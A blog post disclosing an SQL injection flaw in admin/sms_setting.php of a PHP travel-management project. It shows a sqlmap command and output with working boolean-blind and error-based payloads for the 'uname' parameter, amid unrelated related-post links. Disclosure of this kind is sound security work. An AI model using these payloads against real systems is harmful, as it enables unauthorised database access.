SourceCodester Online Tours & Travels Management System sms_setting.php sql injection

于 2024-07-03 08:44:17 发布
阅读量295 收藏 2
点赞数 12
文章标签: php sql 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ENTICE1208/article/details/140141934
版权

SourceCodester Online Tours & Travels Management System sms_setting.php sql injection

Url: admin/sms_setting.php

Abstract:

Line 34 of sms_setting.php invokes a SQL query built using unvalidated input. This call could allow an attacker to modify the statement’s meaning or to execute arbitrary SQL commands.

Explanation:

SQL injection errors occur when:

  1. Data enters a program from an untrusted source.

  2. The data is used to dynamically construct a SQL query.

In this case the data is passed to prepare() in sms_setting.php at line 34.

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

python sqlmap.py -r C:\Users\11361\Desktop\sql.txt

sql.txt

在这里插入图片描述
在这里插入图片描述

POST parameter 'uname' is vulnerable. Do you want to keep testing the others (if any)? [y/N]

sqlmap identified the following injection point(s) with a total of 432 HTTP(s) requests:
---
Parameter: uname (POST)
    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: uname=123' RLIKE (SELECT (CASE WHEN (4458=4458) THEN 123 ELSE 0x28 END)) AND 'ZGfa'='ZGfa&password=123&sender_id=123&update=

    Type: error-based
    Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
    Payload: uname=123' AND EXTRACTVALUE(7621,CONCAT(0x5c,0x7176716a71,(SELECT (ELT(7621=7621,1))),0x7171717871)) AND 'AOCI'='AOCI&password=123&sender_id=123&update=
---

Download Code:
https://www.sourcecodester.com/php/14510/online-tours-travels-management-system-project-using-php-and-mysql.html

ENTICE1208
关注
  • 12
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
webtours_login_success.jmx
04-22
webtours_login_success.jmx
photo_toursim_论文.pdf
09-08
Our system also makes it easy to construct photo tours of scenic or historic locations, and to annotate image details, which are automatically transferred toother relevant images. ...
SourceCodester Online Tours & Travels Management System expense.php sql injection
热门推荐
DMZNX的博客
01-18 4万+
Line 47 of expense.php invokes a SQL query built using unvalidated input. This call could allow an attacker to modify the statement’s meaning or to execute arbitrary SQL commands.SQL injection errors occur when:Data enters a program from an untrusted sour
SourceCodester Online Tours & Travels Management System payment.php sql injection
Q_M_0_9的博客
01-25 4万+
path: admin/operations/payment.phpLine 43 of payment.php invokes a SQL query built with input that comes from an untrusted source. This call could allow an attacker to modify the statement’s meaning or to execute arbitrary SQL commands.SQL injection error
SourceCodester Online Tours & Travels Management System pay.php sql injection
weixin_56393356的博客
01-22 4万+
SourceCodester Online Tours & Travels Management System pay.php sql injectionLine 16 of pay.php invokes a SQL query built using unvalidated input. This call could allow an attacker to modify the statement’s meaning or to execute arbitrary SQL commands.SQL
SourceCodester Online Tours & Travels Management System traveller_details.php cross site scripting
Dwayne_Wade的博客
03-14 1万+
【代码】SourceCodester Online Tours & Travels Management System traveller_details.php cross site scripting
SourceCodester Online Tours & Travels Management System email_setup.php sql injection
xitanging的博客
12-09 1859
【代码】SourceCodester Online Tours & Travels Management System email_setup.php sql injection
SourceCodester Online Tours & Travels Management System booking.php sql injection
@sec
09-05 9142
【代码】SourceCodester Online Tours & Travels Management System booking.php sql injection
Online Tours & Travels Management System ab.php unrestricted upload
Dwayne_Wade的博客
03-14 1677
【代码】Online Tours & Travels Management System ab.php unrestricted upload。
apache服务器: ServerRoot must be a valid directory,Cannot load modules/mod_actions.so into server:
lucboll的博客
01-06 1556
在cmd中使用httpd.exe时出现以下报错:  httpd.exe: Syntax error on line 59 of F:/httpd-2.4.25-x64-vc14-r1/Apache24/conf/httpd.conf: ServerRoot must be a valid  directory   解决方法: 在你的apache安装目录下面找到conf/httpd.conf 代...
vue.js 数据替换_Vue.js的列表数据的同步更新方法
weixin_39828193的博客
01-12 937
这次给大家带来Vue.js的列表数据的同步更新方法,Vue.js列表数据同步更新方法的注意事项有哪些,下面就是实战案例,一起来看一下。数组的 push(),pop(),shift(),unshift(),splice(),sort(),reverse()等都会触发列表的更新;filter(),concat(),slice()等不会触发列表的更新!下面两种情形也不会触发列表数据更新1.为数组的某一项...
8B_Unit3_Online_tours_单元检测卷(含答案).pdf
02-07
8B_Unit3_Online_tours_单元检测卷(含答案).pdf
WebTours.zip
04-14
Web Tours是惠普 loadrunner 自带的一个飞机订票系统网站,它是一款基于ASP.net平台的网站,基于先进的.NET Framework,默认支持SqlServer数据库、Access、Mysq等多种数据库,这是基于ie、Opera、Chrome 、Firefox等...
webtours测试计划.doc
11-16
"WebTours测试计划" 测试计划是对软件应用程序的测试,以确保其满足预期的需求和标准。以下是WebTours测试计划的摘要信息: 测试目的:确保WebTours应用程序满足预期的需求和标准,确保系统的稳定性、安全性和可靠...
发布一个Yii2扩展把debug信息存储到MongoDB中
yagas的专栏
06-26 307
本项目为yii2-debug的扩展,使用MongoDB对debug数据进行存储。如果使用Yii2进行多个应用的开发的话,把debug信息汇聚到一起可以方便查阅。
百度ueditor如何修改图片的保存位置
snow_love_xia的博客
06-28 282
编辑器的保存图片是设置有默认规则的,但是做项目一般也是有图片固定的保存路径,那就需要修改编辑器的图片保存路径,很简单,在ueditor.php配置中修改即可
基于公有云部署wordpress
weixin_60250117的博客
06-28 771
wordpress工作原理:当用户通过浏览器访问LNMP架构的网站时,Nginx服务器会接收到用户的请求。Nginx会根据请求的URL和配置进行匹配,检测请求的Web文件是静态还是动态。 静态页面请求:如果请求的是静态HTML页面,Nginx会直接处理并响应给客户端。 动态页面请求:如果请求的是动态PHP页面(或其他脚本语言),Nginx会将请求发送给后端的PHP模块或CGI。PHP解释器将动态网页解析为静态的HTML网页,然后返回给Nginx。Nginx再将解析后的HTML静态网页结果返回给客户端。
php开发的系统/软件如何实现闭源?
最新发布
无知人生,记录点滴
06-29 426
看到CPanel的介绍“对国际主机市场了解的朋友一定听说过cPanel,它是世界上功能强大,容易使用,因而比较受用户欢迎的虚拟主机控制系统。cPanel 是一套在网页寄存业中最享负盛名的商业软件,是基于于 Linux 和 BSD 系统及。每种工具都有其优势和局限性,选择哪一种取决于你的具体需求、目标平台和对PHP特性的支持要求。想到这个问题的起因是想找一款更好用的服务器管理软件,比较常见的就是 混淆代码、二进制部署,以 PHP 开发且性质为闭源软件。以 PHP 开发且性质为闭源软件。
class AbstractGreedyAndPrune(): def __init__(self, aoi: AoI, uavs_tours: dict, max_rounds: int, debug: bool = True): self.aoi = aoi self.max_rounds = max_rounds self.debug = debug self.graph = aoi.graph self.nnodes = self.aoi.n_targets self.uavs = list(uavs_tours.keys()) self.nuavs = len(self.uavs) self.uavs_tours = {i: uavs_tours[self.uavs[i]] for i in range(self.nuavs)} self.__check_depots() self.reachable_points = self.__reachable_points() def __pruning(self, mr_solution: MultiRoundSolution) -> MultiRoundSolution: return utility.pruning_multiroundsolution(mr_solution) def solution(self) -> MultiRoundSolution: mrs_builder = MultiRoundSolutionBuilder(self.aoi) for uav in self.uavs: mrs_builder.add_drone(uav) residual_ntours_to_assign = {i : self.max_rounds for i in range(self.nuavs)} tour_to_assign = self.max_rounds * self.nuavs visited_points = set() while not self.greedy_stop_condition(visited_points, tour_to_assign): itd_uav, ind_tour = self.local_optimal_choice(visited_points, residual_ntours_to_assign) residual_ntours_to_assign[itd_uav] -= 1 tour_to_assign -= 1 opt_tour = self.uavs_tours[itd_uav][ind_tour] visited_points |= set(opt_tour.targets_indexes) # update visited points mrs_builder.append_tour(self.uavs[itd_uav], opt_tour) return self.__pruning(mrs_builder.build()) class CumulativeGreedyCoverage(AbstractGreedyAndPrune): choice_dict = {} for ind_uav in range(self.nuavs): uav_residual_rounds = residual_ntours_to_assign[ind_uav] if uav_residual_rounds > 0: uav_tours = self.uavs_tours[ind_uav] for ind_tour in range(len(uav_tours)): tour = uav_tours[ind_tour] quality_tour = self.evaluate_tour(tour, uav_residual_rounds, visited_points) choice_dict[quality_tour] = (ind_uav, ind_tour) best_value = max(choice_dict, key=int) return choice_dict[best_value] def evaluate_tour(self, tour : Tour, round_count : int, visited_points : set): new_points = (set(tour.targets_indexes) - visited_points) return round_count * len(new_points) 如何改写上述程序,使其能返回所有已经探索过的目标点visited_points的数量,请用代码表示
06-10
可以在 `solution()` 方法中添加一个变量来记录已经探索过的目标点数量,然后在每次更新 `visited_points` 后更新这个变量。下面是修改后的代码: ``` class AbstractGreedyAndPrune(): def __init__(self, aoi: AoI, uavs_tours: dict, max_rounds: int, debug: bool = True): self.aoi = aoi self.max_rounds = max_rounds self.debug = debug self.graph = aoi.graph self.nnodes = self.aoi.n_targets self.uavs = list(uavs_tours.keys()) self.nuavs = len(self.uavs) self.uavs_tours = {i: uavs_tours[self.uavs[i]] for i in range(self.nuavs)} self.__check_depots() self.reachable_points = self.__reachable_points() def __pruning(self, mr_solution: MultiRoundSolution) -> MultiRoundSolution: return utility.pruning_multiroundsolution(mr_solution) def solution(self) -> Tuple[MultiRoundSolution, int]: mrs_builder = MultiRoundSolutionBuilder(self.aoi) for uav in self.uavs: mrs_builder.add_drone(uav) residual_ntours_to_assign = {i : self.max_rounds for i in range(self.nuavs)} tour_to_assign = self.max_rounds * self.nuavs visited_points = set() explored_points = 0 while not self.greedy_stop_condition(visited_points, tour_to_assign): itd_uav, ind_tour = self.local_optimal_choice(visited_points, residual_ntours_to_assign) residual_ntours_to_assign[itd_uav] -= 1 tour_to_assign -= 1 opt_tour = self.uavs_tours[itd_uav][ind_tour] new_points = set(opt_tour.targets_indexes) - visited_points explored_points += len(new_points) visited_points |= new_points # update visited points mrs_builder.append_tour(self.uavs[itd_uav], opt_tour) return self.__pruning(mrs_builder.build()), explored_points class CumulativeGreedyCoverage(AbstractGreedyAndPrune): def evaluate_tour(self, tour : Tour, round_count : int, visited_points : set): new_points = set(tour.targets_indexes) - visited_points return round_count * len(new_points) def local_optimal_choice(self, visited_points, residual_ntours_to_assign): choice_dict = {} for ind_uav in range(self.nuavs): uav_residual_rounds = residual_ntours_to_assign[ind_uav] if uav_residual_rounds > 0: uav_tours = self.uavs_tours[ind_uav] for ind_tour in range(len(uav_tours)): tour = uav_tours[ind_tour] quality_tour = self.evaluate_tour(tour, uav_residual_rounds, visited_points) choice_dict[quality_tour] = (ind_uav, ind_tour) best_value = max(choice_dict, key=int) return choice_dict[best_value]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值